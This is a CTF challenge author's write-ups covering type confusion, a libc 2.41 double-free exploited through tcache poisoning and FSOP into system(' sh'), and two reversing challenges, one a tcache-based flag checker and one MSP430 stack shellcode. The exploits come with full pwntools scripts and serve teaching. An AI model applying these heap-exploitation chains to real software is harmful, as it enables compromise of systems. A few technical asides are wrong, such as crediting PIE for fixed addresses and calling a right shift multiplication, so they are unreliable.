SIT ctf author writeups
recommended listening is 4 raws by esdeekid.

thanks to the exco for letting me contribute! :)
pwn/green-yuri
this challenge is about type confusion.
case '3':
unsigned long long addr;
printf("alright! finally. where's your album stored at? > ");
scanf("%llx", &addr);
while ((c = getchar()) != '\n' && c != EOF);
Album *album = (Album *) addr;
if (
!strncmp(album->album_name, "me to her", 16) &&
!strncmp(album->artist_name, "mitsuki koga", 16) &&
album->song_count==10 &&
album->completed
) win();
puts("hmmm.. seems like the album isn't quite finished yet...");
break;
the win condition for this challenge is passing in a valid Album struct with the correct fields set. we’re allowed to pass a pointer to our struct, the program casts it to an Album pointer, and checks if all of the fields are correctly set.
however, we do not have a way to actually create an Album struct. what we do have, however, is a way to add to paychecks, which is an array of doubles.
case '2':
printf("how much money did you make today? > ");
if (scanf("%lf", &paychecks[days]) == 1) {
while ((c = getchar()) != '\n' && c != EOF);
printf("you made %lf dollars today!\n", paychecks[days]);
} else puts("invalid input...");
break;
the program is compiled w/ no PIE (position independent executable) and the paychecks array is defined as a global variable outside of the scope of the main() function. this means that the address of paychecks is always the same.
first, we must understand what type confusion actually is. type confusion is when a program treats a variable with type A as if it were a variable with type B. it is not immediately clear why this leads to logic bugs, but consider the following program:
typedef struct {
int secret_value;
int other_secret_value;
} Secret;
typedef struct {
int not_secret_value;
} Not_Secret;
void print_value(void* val) {
Secret *secret = (Secret *) val;
printf("%d, %d",
secret->secret_value,
secret->other_secret_value
);
return;
}
if we ever get to call print_value() on an object w/ type Not_Secret, that second memory access (secret->other_secret_value) is going to end up accessing an out-of-bounds area not defined within our Not_Secret value.
- typically these kinds of bugs are a lot more common in v8 / browser exploitation, the example presented in this challenge is a little contrived. but really i just thought to myself - huh what’s the most green-yuri coded pwn concept, and i ended up w/ type confusion.
anyways back to the challenge. let’s hop into GDB and present an example as to what might happen if we cast our paychecks array as an Album struct.
gef> p paychecks
$1 = {
[0x0] = 100,
[0x1] = 900,
[0x2] = 300,
[0x3] = 0 <repeats 125 times>
}
here is the result of p paychecks after i put in some sample values (note that because i compiled this program w/ debug symbols, gef knows that the paychecks variable is an array of doubles, and prints it accordingly). we can also see the underlying bytewise representation of paychecks, by doing x/4g:
gef> x/4g &paychecks
0x404080 <paychecks>: 0x4059000000000000 0x408c200000000000
0x404090 <paychecks+16>: 0x4072c00000000000 0x0000000000000000
we can verify that 0x4059000000000000 is the correct 64-bit hexadecimal representation of the integer 100 when cast into a double, as seen below.

now, let’s see what will happen when we cast paychecks to an Album struct.
gef> set $album = (Album*)paychecks
gef> p $album
$2 = (Album *) 0x404080 <paychecks>
gef> ptype $album
type = struct {
char album_name[16];
char artist_name[16];
short song_count;
_Bool completed;
} *
gef> p $album->album_name
$3 = "\000\000\000\000\000\000Y@\000\000\000\000\000 \214@"
gef> p $album->artist_name
$4 = "\000\000\000\000\000\300r@\000\000\000\000\000\000\000"
we can see that the program still attempts to parse it as a valid Album struct by just reading the members of the struct as if they were the correct type (i.e., it tries to read the first float as a sixteen-long character array), so on and so forth.
our goal is to figure out how to forge this struct by figuring out the correct doubles to pass in to the program.
we can just do this dynamically w/ gdb as well. we’ll set our struct with the correct values, as shown below.
gef> set $album->album_name = "me to her"
gef> set $album->artist_name = "mitsuki koga"
gef> set $album->song_count = 10
gef> set $album->completed = 1
then, let’s check the values at paychecks.
gef> x/8g &paychecks
0x404080 <paychecks>: 0x6568206f7420656d 0x0000000000000072
0x404090 <paychecks+16>: 0x20696b757374696d 0x0000000061676f6b
0x4040a0 <paychecks+32>: 0x000000000001000a 0x0000000000000000
0x4040b0 <paychecks+48>: 0x0000000000000000 0x0000000000000000
and finally, let’s see what they would look like as doubles.
gef> x/6lf &paychecks
0x404080 <paychecks>: 3.1285662487989957e+180 5.6323483625902106e-322
0x404090 <paychecks+16>: 1.5167139053769265e-152 8.0738660577993429e-315
0x4040a0 <paychecks+32>: 3.2384026822310346e-319 0
so, if we just pass in these floats, and then get the address to paychecks (which is deterministic at every single run, due to PIE), we can win.
# it's just type confusion
from pwn import *
paychecks_addr = 0x404080
p = process('green-yuri')
doubles = [
'3.1285662487989957e+180',
'5.6323483625902106e-322',
'1.5167139053769197e-152',
'8.0738658996983363e-315',
'3.2384026822310346e-319',
'6.6387106766042457e-319',
'0',
'0'
]
# can ownself derive from manually gdbing
for i in doubles:
p.sendline(b'2')
p.sendline(i.encode())
p.sendline(b'3')
p.sendline(b'0x404080')
while True:
print(p.recvline())
pwn/plushie-warehouse
this challenge is about exploiting a double-free in libc 2.41. before we get started, some background: i sent this challenge to my friend fern, who decided to write up the technique we use in greater detail here! you can read their writeup, it is very good.
the double-free is present in this section of code:
void sort_shipments(int idx) {
if (orders_idx >= WAREHOUSE_SIZE) {
printf("the list of orders is already full!\n");
return;
}
sell_list[orders_idx] = idx;
orders_idx++;
printf("successfully added %d to the orders list.", idx);
return;
}
void ship_orders() {
printf("shipping out %d orders...\n", orders_idx);
for (int idx = 0; idx < orders_idx; idx++) {
if (sell_list[idx] != 0xff) {
Plushie p = plushies[sell_list[idx]];
if (p.name) {
free(p.name);
}
}
}
// then null out the structs
for (int idx = 0; idx < orders_idx; idx++) {
if (sell_list[idx] != 0xff) {
memset(&plushies[sell_list[idx]], 0, sizeof(plushies[sell_list[idx]]));
}
}
orders_idx = 0;
reset_sell_list();
}
we are given two options: add chunks to an array to be freed, then oneshot free them all. the key observation here is that we can add the same chunk twice to the array. if we add the same chunk twice, then after we do our oneshot free, it will free the same chunk twice accordingly. this is our double-free. how do we exploit it, especially on libc 2.41? libc 2.41 brings about a host of difficulties when it comes to this challenge, here are a list of them:
- double free protection in tcache AND fastbin.
- pointer mangling in tcache.
- fastbin malloc checks.
how do we defeat each check?
1a. double free protection in tcache. here is the relevant source code from elixir.
- in general i don’t expect people to go so in-depth and read elixir directly, but i think it’s good practice.
static __attribute__ ((noinline)) void
tcache_double_free_verify (tcache_entry *e, size_t tc_idx)
{
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = REVEAL_PTR (tmp->next), ++cnt)
{
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}
problem: whenever we are about to free a chunk t into tcache, we check each entry and make sure there is no duplicate. if there is a duplicate, we error out.
solution: this is unavoidable. we basically just have to not perform double frees directly into tcache.
1b. double free protection in fastbins.
if (SINGLE_THREAD_P)
{
/* Check that the top of the bin is not the record we are going to
add (i.e., double free). */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
}
problem: whenever we are about to free a chunk t into fastbin, we check if the top of fastbin points to that same chunk t. if so, we error out.
solution: we can just free another sacrificial chunk before doing our double free. in essence, we free chunk t, then chunk t1, then chunk t again.
2. pointer mangling in tcache, elixir source
any person who’s done tcache poisoning should be familiar with this.
/* Safe-Linking:
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
problem: chunks in tcache point to the next chunk in tcache. however, their pointers are mangled with the value (heap_base >> 12), so we will need to know where the heap is in memory.
gef> bins
----------------- Tcache Bins for arena 'main_arena' (&tcache_perthread_struct->entries[0]: 0x5555555590a8) -----------------
tcachebins[idx=1, size=0x30, @0x5555555590b0]: fd=0x555555559840 count=7
-> Chunk(base=0x555555559830, addr=0x555555559840, size=0x30, flags=PREV_INUSE, fd=0x55500000cd49(=0x555555559810))
...
gef> x/4x 0x555555559800
0x555555559800: 0x0000000000000000 0x0000000000000031
0x555555559810: 0x000055500000c2b9 0xb6f37a1e26ba13a0
note the fd=0x55500000cd49(=0x555555559810) line. 0x55500000cd49 is the value actually stored in the chunk, whereas 0x555555559810 is the value of the actual pointer after unmangling.
solution: the program does not perform write on allocations. if we malloc, free, then malloc a chunk t, reading directly from that chunk t would give us the data that gets populated during freeing, which is a pointer to the next chunk in tcache. this gives us our heap leak.
3. fastbin malloc checks.
problem: fastbin checks both the size header and the alignment whenever we malloc a new chunk from it. this severely limits our arballoc (if we ever get it), because we would only be able to arballoc to places that pass both checks.
---------------------------------------------- Fast Bins for arena 'main_arena' ----------------------------------------------
fastbins[idx=1, size=0x30, @0x7ffff7e13ad8]: fd=0x0000004058c0
-> Chunk(base=0x4058c0, addr=0x4058d0, size=0x30, flags=PREV_INUSE, fd=0x000000405c95
(=0x000000405890)) <- pointing to this address
...
gef> x/4gx 0x000000405890
0x405890: 0x0000000000000000 0x0000000000000031 <- valid size header
0x4058a0: 0x0000000000405c65 0x0000000000000000
to exemplify, note the above snippet. we see a valid fastbin chunk’s fd ptr points to a chunk where the size header is correctly set as 0x31. if we, however, tried to allocate to something useful (such as, say, the stderr file structure, the size check would catch us).
solution: we don’t do our arbitrary allocation from fastbins! we will do them from tcache instead. essentially, what we do is:
- fill the tcache by allocating 7 times
- fill the fastbins by allocating 2 more times. call this chunk A and chunk B.
- add our tcache chunks to the freelist.
- add chunk A to the freelist, then chunk B, then chunk A again. this circumvents the first fastbin dup check.
- then, perform our oneshot free.
- then, we empty tcache again to make way for our duplicated pointers (by just mallocing chunks of the same size).
- then… SECRET FENG SHUI, ENABLED BY:
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
simply put, when we reallocate from fastbins when the tcache is empty, all our chunks get yanked into the fastbin, without checking for double frees within the fastbin itself.
so, if we just claim a fastbin chunk once, our duplicated pointers automatically get put in tcache, and we are free to tcache poison and claim them from there!
let’s consolidate our exploit for now. first we can obtain a libc leak from unsorted bins. recall that the unsorted bins are a doubly linked list with both fd and bk pointers, and that when we free a chunk into the unsorted bins, both pointers point to main_arena, which is an area in libc. you can see this in action w/ the following example below:
gef> bins
---------------------------- Unsorted Bin for arena 'main_arena' ----------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7e13b30]: fd=0x555555559000, bk=0x7ffff7e13b20
-> Chunk(base=0x555555559000, addr=0x555555559010, size=0x510, flags=PREV_INUSE,
fd=0x7ffff7e13b20 <main_arena+0x60>, bk=0x7ffff7e13b20 <main_arena+0x60>)
[+] Found 1 valid chunks in unsorted bin (when traced from `bk`)
we can free a chunk straight into the unsorted bin simply by just allocating a size so large that it does not fit into the tcache. the code to perform this is below (also note that main_arena is always a fixed offset from libc base).
# our libc leak:
malloc(0, 0x1000)
malloc(1, 0x20) # guard chunk, so that when we free the 0x1000 sized chunk it doesn't get consolidated w/ the top chunk
addf(0); addf(1);
free()
malloc(0, 0x1000) # we reclaim our chunk from the unsorted bins
libc_leak = int.from_bytes(read().split(b'name ')[1].split(b',')[0], 'little')
print(hex(libc_leak))
libc.address = libc_leak - 0x1e7b20 # whack in gdb
addf(0); free();
afterwards, we can get a heap leak by doing the same thing, but in the tcache.
# heap leak
malloc(0, 0x30)
addf(1); addf(0); free()
malloc(0, 0x30)
malloc(1, 0x30)
heap_leak = int.from_bytes(read().split(b'name ')[2].split(b',')[0], 'little')
print(hex(heap_leak))
addf(0); addf(1); free()
this is the same concept as above: we malloc chunks, free them, then reallocate them so that we can read the fd pointer (that gets populated on freeing).
now, onto the actual exploit:
print('[*] allocating 9 chunks to fill tcache + double free')
for i in range(9):
malloc(i, 0x30)
for i in range(7):
addf(i)
free() # fill tcache
addf(7); addf(8); addf(7)
free() # double free
we allocate 9 chunks, free the first 7. then we add chunk 8, chunk 9, and then chunk 8 again to the free list. this results in the following state in fastbins.
--------------------- Fast Bins for arena 'main_arena' ---------------------
fastbins[idx=2, size=0x40, @0x7f94d0e13ae0]: fd=0x564ea7bd11c0
-> Chunk(base=0x564ea7bd11c0, addr=0x564ea7bd11d0, size=0x40, flags=PREV_INUSE, fd=0x564bc35769d1(=0x564ea7bd1200))
-> Chunk(base=0x564ea7bd1200, addr=0x564ea7bd1210, size=0x40, flags=PREV_INUSE, fd=0x564bc3576a11(=0x564ea7bd11c0))
-> Chunk(base=0x564ea7bd11c0, addr=0x564ea7bd11d0, size=0x40, flags=PREV_INUSE, fd=0x564bc35769d1(=0x564ea7bd1200))
-> 0x564ea7bd11c0 [loop detected]
[+] Found 2 valid chunks in fastbins
note the (loop detected) - that means we have our double free. afterwards, we empty tcache again and reclaim our first fastbin chunk, thereby putting our duplicated pointers into tcache.
print('[*] re-emptying tcache')
for i in range(7):
malloc(i, 0x30) # empty tcache so we can yank the fastbin chunks into tcache for tcache poisoning
malloc(7, 0x30) # yank!
input('...')
this results in the following state in tcache. now, if we can just claim the first chunk, we essentially have a use-after-free. this is because after claiming the first chunk, we can edit it (and thereby edit its fd pointer).
assume we start with tcache in this state, where we have 3 chunks, the first and last of which are duplicated.
tcachebins[idx=2, size=0x40, @0x55764a9700c8]: fd=0x55764a96f210 count=-21868
-> Chunk(base=0x55764a96f200, addr=0x55764a96f210, size=0x40, flags=PREV_INUSE, fd=0x55731df258bf(=0x55764a96f1d0))
-> Chunk(base=0x55764a96f1c0, addr=0x55764a96f1d0, size=0x40, flags=PREV_INUSE, fd=0x55731df25b7f(=0x55764a96f210))
-> Chunk(base=0x55764a96f200, addr=0x55764a96f210, size=0x40, flags=PREV_INUSE, fd=0x55731df258bf(=0x55764a96f1d0))
then, we claim the first chunk, and then edit it to some nonsense value.
print('[*] now poisoning tcache for that chunk')
malloc(7, 0x30)
write(7, p64(0xcacacacacacacaca ^ heap_leak))
input('...')
viewing the state of the tcache, we can now see that the last chunk’s fd pointer is now corrupted.
tcachebins[idx=2, size=0x40, @0x55caa68ed0c8]: fd=0x55caa68ec210 count=-21960
-> Chunk(base=0x55caa68ec200, addr=0x55caa68ec210, size=0x40, flags=PREV_INUSE, fd=0x55cffa24a93c(=0x55caa68ec1d0))
-> Chunk(base=0x55caa68ec1c0, addr=0x55caa68ec1d0, size=0x40, flags=PREV_INUSE,
fd=0xcacacacf9660a226(=0xcacacacacacacaca), corrupted)
^ kena poison
now we essentially have arbitrary write (albeit of a limited size). our first goal should be to get writes of a larger size. how do we do this?
by tcache poisoning again! we can arbitrarily allocate over another bigger chunk’s fd pointer.
malloc(8, 0x200) # this is the chunk whose fd ptr we want to overwrite
malloc(9, 0x200) # malloc another time to increase tcache count
addf(8); addf(9); free()
viewing the state of the tcache once more, we can figure out which address we want to override.
tcachebins[idx=31, size=0x210, @0x562a377701b0]: fd=0x562a3776f460 count=7
-> Chunk(base=0x562a3776f450, addr=0x562a3776f460, size=0x210, flags=PREV_INUSE, fd=0x562f55d5853f(=0x562a3776f250))
-> Chunk(base=0x562a3776f240, addr=0x562a3776f250, size=0x210, flags=PREV_INUSE, fd=0x000562a3776f(=0x000000000000))
gef> x/4x 0x562a3776f450
0x562a3776f450: 0x0000000000000000 0x0000000000000211
0x562a3776f460: 0x0000562f55d5853f 0x2f8390a87fe29df0
(the actual address would be 0x[HEAP BASE]460).
tcachebins[idx=2, size=0x40, @0x558da03820c8]: fd=0x558da0381210 count=-21889
-> Chunk(base=0x558da0381200, addr=0x558da0381210, size=0x40, flags=PREV_INUSE, fd=0x5588f8e21251(=0x558da03811d0))
[here is our chunk of interest]
-> Chunk(base=0x558da03811c0, addr=0x558da03811d0, size=0x40, flags=PREV_INUSE,
fd=0x5588f8e217e1(=0x558da0381460))
note that our 2nd chunk has the corrupted fd pointer. this means that we’ll need to allocate 3 chunks in order to get our chunk arbitrarily allocated.
print('[*] now getting arballoc over victim chunk fd ptr')
target_addr = (heap_leak << 12) | 0x460
write(7, p64(target_addr ^ heap_leak))
malloc(11, 0x30); malloc(12, 0x30); malloc(13, 0x30)
write(13, p64(0xcacacacacacacaca ^ heap_leak))
print(f'[*] larger chunk should now be poisoned')
tcachebins[idx=31, size=0x210, @0x5587b6a9a1b0]: fd=0x5587b6a99460 count=7
-> Chunk(base=0x5587b6a99450, addr=0x5587b6a99460, size=0x210, flags=PREV_INUSE, fd=0xcacacacf92b1a053(=0xcacacacacacacaca), corrupted)
-> 0xcacacacacacacaca [corrupted chunk]
perfect! we now have big enough writes. given that we have access to such large writes, we can just do fsop and win.
input('[!] sanity check')
malloc(8, 0xe0)
malloc(9, 0xe8)
print('[*] chunk now claimed over stdout')
payload = flat({
0x00: b" sh",
0x20: 0x0,
0x28: 0x1,
0x88: libc.sym._IO_stdfile_1_lock,
0xa0: libc.sym._IO_2_1_stdout_,
0xc0: 0x0,
0xd8: libc.sym._IO_wfile_jumps-0x20,
0x18: 0x0,
0x30: 0x0,
0xe0: libc.sym._IO_2_1_stdout_,
0x68: libc.sym.system
}, filler=b"\x00")
p.sendline(b'2')
p.sendline(b'9')
p.sendline(payload)
p.interactive()
rev/san andreas fault line
The binary isn’t hard to rev given there’s no obfuscation, any compiler anyhow dogshit whack also can. The key here is this traverse() function:
void traverse(unsigned long long **ptr1, unsigned long long **ptr2, unsigned long long **saved_ptr, uintptr_t pointer_mangle, ByteCheck byte_chunks[4], unsigned char flag_chunks[4], int iter) {
free(*ptr2);
free(*ptr1);
for (int y = 0; y < 2; y++) {
unsigned long long target_addr = 0x100 + ((pointer_mangle << 12) | ((flag_chunks[0] >> (4*y) & 0xf) ^ 0x2 ^ byte_chunks[0].nibbles[y]));
unsigned long long *fake_chunk = (unsigned long long*)target_addr;
fake_chunk[-1] = 0x31;
*saved_ptr[0] = target_addr ^ pointer_mangle;
*ptr1 = malloc(0x20);
*ptr2 = malloc(0x20);
free(*ptr2);
free(*ptr1);
}
Complicated. But anyways before that there’s two rudimentary checks that just veerify if our flag has the correct CyberBlitz2025{} prefix and suffix, formed by dereferencing the ptr output of strstr().
strncpy(actual_bytes, strstr(flag, "CyberBlitz2025{")+15, sizeof(actual_bytes));
char *c = strstr(actual_bytes, "}");
*c = '\0';
Hopefully this requires no explanation. Moving on to the interesting part:
We’ll need to know some things about how malloc() works on the latest version of libc, 2.41 (the libc version is provided in the files distributed to the competitors, too.)
First thing is that malloc() mangles the tcache ptr with a certain key. This is computed as pointer_mangle in the binary, so it’s already taken care of for us.
Second thing is that malloc() will throw a SIGABRT if it tries to malloc() at an area that is not 0x10 aligned. This is the functionality that the entire flag-checker is based off of: the given inputs are used to manipulate tcache pointers. We go byte-by-byte, poisoning the fd ptrs of each chunk in our bin, and then re-malloc() - if our bytes are correct, the ptrs will be correctly 0x10 aligned, and we’re good. We need to do this for each byte.
Now, the specifics as to how this actually works:
When we free two chunks A and B, they both get sent to tcache, and chunk A is populated with an fd ptr that points to where B is. If we have an UAF, we can just alter this fd ptr after it’s freed, hence controlling where malloc() tries to allocate a chunk at. This is a basic heap pwn concept known as tcache poisoning. There’s a few kinks for this to actually work (mainly, valid chunk headers, but I take care of those in the binary already).
You might ask: wait why does this sound like pwn and not rev. The answer is: umm uhh :3
Anyways, we have to unpack this bitwise nonsense being performed in traverse():
unsigned long long target_addr = 0x100 + ((pointer_mangle << 12) | ((flag_chunks[0] >> (4*y) & 0xf) ^ 0x2 ^ byte_chunks[0].nibbles[y]));
We can ignore pointer_mangle << 12. y is iterated through from 0 to 1, and the bitshifts actually suggest to use that we’re isolating each nibble of the byte, xoring it with a given constant (it ranges from 0x2 - 0x8 depending on which loop we’re in) and then further xoring it with the 1st or 2nd nibble in byte_chunks. We know that we need this to eventually be 0x10.
This essentially reduces the chal to a trivial xor problem, with only one unknown (our flag byte!).
We can just code up a simple Python script, extracting the ByteChecks from our binary.
flag_bytes =
[[18,21],[16,23],[20,17],[19,30],[29,23],[16,17],[30,16],[28,27],[22,21],[27,17],[21,16],[25,28],[16,21],[27,17],[18,18],[26,29],[18,17],[20,19],[25,19],[28,31],[26,20],[16,23],[18,17],[23,29],[18,21],[28,18],[22,21],[22,30],[17,17],[27,17],[21,17],[25,27],[17,17],[23,23],[21,21],[24,31],[29,23],[20,23],[24,16],[23,29],[22,21],[28,16],[21,21],[23,29],[20,20],[21,23],[22,21],[24,27],[16,21],[27,17],[18,18],[26,29],[17,17],[16,23],[27,16],[23,29],[19,20],[22,18],[22,21],[29,31],[22,21],[27,17],[27,16],[27,27]]
for idx, byte in enumerate(flag_bytes):
offset = 0x2 * (1 + (idx % 4))
flag = 0x00
for idx, nibble in enumerate(byte):
flag_nibble = 0x10 ^ offset ^ nibble
flag |= flag_nibble << (idx * 4)
print(chr(flag), end='')
Done!
rev/throwback
the file is a stripped, statically linked binary for the msp430:
[-(navi's curette)-[~/venvs/msp430-nix-env/example-asm]
[-$ file rev.bin
rev.bin: ELF 32-bit LSB executable, TI msp430, version 1 (embedded), statically linked, not stripped
you’re not gonna be able to run this on any laptop or pc you have lying around, so we’ll have to figure out how to interact with it statically.
(orrr you can just run this through a msp430 emulator, this does just solve it automatically.)
static reversing
there’s a toolchain for the msp430 with a few useful tools, but the main one here is objdump, which we can use to obtain clean disassembly for the binary. we definitely won’t be able to obtain anything resembling ‘clean’ decompilation - the assembly was handwritten and doesn’t decompile at all. (however, ghidra is able to recognize the msp430 format and give a working decomp as well. i find working with msp430-elf-objdump’s output a lot cleaner.)
0000c000 <.text>:
c000: 0d 40 mov r0, r13 ;
c002: 31 40 00 20 mov #8192, r1 ;#0x2000
c006: 0f 41 mov r1, r15 ;
c008: 3e 40 00 4d mov #19712, r14 ;#0x4d00
c00c: 0e 12 push r14 ;
c00e: 3e 40 03 43 mov #17155, r14 ;#0x4303
c012: 0e 12 push r14 ;
c014: 3e 40 2b 52 mov #21035, r14 ;#0x522b
looking at the assembly, we see a whole lot of these mov and push instructions, at least like 100 or so. but the first few instructions are just movs to certain registers.
recall that for the msp430, certain registers have certain special functions. the important ones for our case are:
-
r0: program counter. tells us which instruction is being executed. note that we can perform operations on this register like any other - we canmovto it, which changes our entire program flow. we can alsoadd/subto it, which is actually just what ajmpinstruction is a mnemonic for. -
r1: stack pointer, points to the stack in memory. recall that the stack grows downwards, so if our stack pointer is at0x2000, and we push a word0xcafe, the stack pointer would then be decreased to0x1ffe. -
r2: status register. not relevant for our purposes, won’t cover. -
r3: constant generator. the msp430 is able to generate a few hardcoded constants _within_ their registers, such that they don't need to be loaded from memory and occupy precious space. the constants are1, 2, 4, 8`.
the rest are all general purpose registers which we can use however we want.
inspecting the binary’s disassembly again, let’s just break it down some more:
c000: 0d 40 mov r0, r13 ;
c002: 31 40 00 20 mov #8192, r1 ;#0x2000
c006: 0f 41 mov r1, r15 ;
so this section preserves the initial program counter into r13, and also initializes the stack pointer at a fixed point 0x2000.
then. there’s a whole lot of mov _word_, r14 and push r14 calls:
c6de: 0e 12 push r14 ;
c6e0: 3e 40 24 82 mov #-32220,r14 ;#0x8224
c6e4: 0e 12 push r14 ;
c6e6: 3e 40 04 54 mov #21508, r14 ;#0x5404
c6ea: 0e 12 push r14 ;
c6ec: 3e 40 04 54 mov #21508, r14 ;#0x5404
c6f0: 0e 12 push r14 ;
c6f2: 3e 40 04 54 mov #21508, r14 ;#0x5404
c6f6: 0e 12 push r14 ;
c6f8: 3e 40 34 52 mov #21044, r14 ;#0x5234
c6fc: 0e 12 push r14 ;
c6fe: 3e 40 04 e4 mov #-7164, r14 ;#0xe404
c702: 0e 12 push r14 ;
(list cut for brevity)
and finally we reach this br instruction:
c704: 00 41 br r1 ;
br is equivalent to mov.w r1, r0: essentially, we are moving the addresses from r1 into r0. since that’s the stack pointer and the program counter, we’re essentially going to execute the contents of the stack! meaning, the whole list of mov and push instructions contain actual code that will be executed!
the next step is to disassemble the dynamically loaded shellcode. there’s a few ways to do this. to be honest i would just patch the binary w/ nops and let the objdump disassembler do the rest of the work, but there are some caveats with doing this:
because the stack grows downward and the program counter goes upwards, this means the very last instruction pushed onto the stack is the first one executed, and the very first instruction pushed onto the stack is the last one executed. a stack is LIFO, after all, so this should be intuitive.
anyways let’s view a hexdump so we can better see what we’re working with. we want to access the bytecode and bytecode only, and leave everything else untouched. we can crossref with the objdump output as well, noting that we should see an 0d40 as our beginning instruction.
[-$ xxd rev.bin
00000000: 7f45 4c46 0101 01ff 0000 0000 0000 0000 .ELF............
00000010: 0200 6900 0100 0000 00c0 0000 3400 0000 ..i.........4...
00000020: cc07 0000 2d00 0000 3400 2000 0200 2800 ....-...4. ...(.
00000030: 0500 0400 0100 0000 0000 0000 8cbf 0000 ................
00000040: 8cbf 0000 8407 0000 8407 0000 0500 0000 ................
00000050: 0400 0000 0100 0000 8607 0000 feff 0000 ................
00000060: feff 0000 0200 0000 0200 0000 0400 0000 ................
00000070: 0400 0000 [0d40] 3140 0020 0f41 3e40 004d .....@1@. .A>@.M
00000080: 0e12 3e40 0343 0e12 3e40 2b52 0e12 3e40 ..>@.C..>@+R..>@
00000090: 0b5b 0e12 3e40 0b5b 0e12 3e40 0b5b 0e12 .[..>@.[..>@.[..
000000a0: 3e40 2b52 0e12 3e40 0b5b 0e12 3e40 0b5b >@+R..>@.[..>@.[
000000b0: 0e12 3e40 0b5b 0e12 3e40 2b82 0e12 3e40 ..>@.[..>@+...>@
000000c0: 3b82 0e12 3e40 0b5b 0e12 3e40 0b5b 0e12 ;...>@.[..>@.[..
000000d0: 3e40 0b5b 0e12 3e40 0b5b 0e12 3e40 0b5b >@.[..>@.[..>@.[
000000e0: 0e12 3e40 0b5b 0e12 3e40 3b52 0e12 3e40 ..>@.[..>@;R..>@
000000f0: 0beb 0e12 3e40 1a83 0e12 3e40 2a52 0e12 ....>@....>@*R..
00000100: 3e40 0a5a 0e12 3e40 0a5a 0e12 3e40 0a5a >@.Z..>@.Z..>@.Z
00000110: 0e12 3e40 2a53 0e12 3e40 3a52 0e12 3e40 ..>@*S..>@:R..>@
00000120: 0a5a 0e12 3e40 0a5a 0e12 3e40 0a5a 0e12 .Z..>@.Z..>@.Z..
in the above dump i’ve wrapped the 0d40 instruction in brackets - so we know that that’s where execution begins. essentially, what we want is to patch out every 3e40 instruction (which is a mov.w r14) and leave only the word that is actually being pushed.
import subprocess
binary_bytes = open('rev.bin', 'rb').read()
patched_bytes = list(binary_bytes)
for idx in range(0, len(binary_bytes) - 1, 2):
word = binary_bytes[idx:idx+2].hex()
if word == '3e40' or word=='0e12':
patched_bytes[idx] = 0x03 # this is a nop
patched_bytes[idx+1] = 0x43
patched_binary = open('rev_patched.bin', 'wb')
above is the script i used. patching out the push and mov instructions and disassembling, we get the following:
c6d6: 04 54 rla r4 ;
c6dc: 04 54 rla r4 ;
c6e2: 24 82 sub #4, r4 ;r2 As==10
c6e8: 04 54 rla r4 ;
c6ee: 04 54 rla r4 ;
c6f4: 04 54 rla r4 ;
c6fa: 34 52 add #8, r4 ;r2 As==11
c700: 04 e4 xor r4, r4 ;
c702: 03 43 nop
c704: 00 41 br r1 ;
oh! we have valid bytecode! we have edits to registers!!! woohoo! yipee! we know what its doing now!! woohoo!!!
keep in mind that the commands are LIFO so we need to read it from the bottom up. but we can see that there’s a clear to the r4 register, and then we do various arithmetic operations.
and then…
c00a: 00 4d br r13 ;
c016: 2b 52 add #4, r11 ;r2 As==10
c01c: 0b 5b rla r11 ;
c022: 0b 5b rla r11 ;
c028: 0b 5b rla r11 ;
c02e: 2b 52 add #4, r11 ;r2 As==10
c034: 0b 5b rla r11 ;
c03a: 0b 5b rla r11 ;
that br r13 just tells us we’re swapping control flow back to the address stored in r13. if we recall, the content stored in r13 is just…
c000: 0d 40 mov r0, r13 ;
it’s just the original pc from the main program flow! so this just moves us back into the start of the original program, and the program enters an infinite loop!
so now, where do we get the flag? this is the part of the chal that might be a little ‘guessy’ but given the msp430 has no builtin input/output functionality, i couldn’t just write a flagchecker that accepts input from a terminal (believe me, i’ve tried! the school has not been able to give me the necessary devices for UART unfortunately, i wouldve loved to implement this in the chal)
given that we’re altering the registers, why don’t we just figure out what the values of each register would be after the program execution? registers r4 to r11 are modified twice in the shellcode loop with the arithmetic operations, so we can basically just write an ‘emulator’ of sorts to figure out what the operations are actually doing.
there’s adds and subs which are quite straightforward. we also only use the numbers 1, 2, 4, 8 bc of the msp430’s constant generator register, which is not entirely necessary to know (but that’s why the instructions are able to fit in a word each).
the other thing that might be confusing is the rla instruction (rotate left), which rotates the bits in the register one position to the left. as we all know a bitshift to the right is equivalent to multiplying by two - so, all the register ops amount to is just adds, muls, and subs.
now we will work on actually emulating the instructions by parsing the raw bytes. let’s eyepower some of these - of course, you can breakdown the individual bits that make up the instructions and actually that would be a lot more elucidatory but shhhhhhhhhhhh:
rla:
this one’s easy because it’s always a shift by so we don’t need to worry about parsing constants.
04 54 rla r4
05 55 rla r5
06 56 rla r6
07 57 rla r7
